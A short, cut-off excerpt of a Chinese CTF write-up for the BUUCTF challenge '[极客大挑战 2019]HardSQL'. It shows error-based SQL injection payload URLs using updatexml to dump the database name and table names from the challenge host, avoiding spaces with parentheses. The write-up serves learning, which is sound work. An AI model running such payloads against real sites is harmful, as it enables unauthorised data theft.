[极客大挑战 2019]HardSQL

1 · 孤桜懶契 · May 20, 2021, 1:45 a.m.

[极客大挑战 2019]HardSQL1、用hackbar进行构造传参测试2、测试限制的传参3、爆库、爆表123http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php?username=admin&password= admin'or(updatexml(1,concat(0x7e,(select(database()))),1))%234、爆表123http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php?username=admin&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))%235、爆字段123http://f232a01e-3c9d-480d-bd28-439ce083...

Read full post on gylq.gitee.io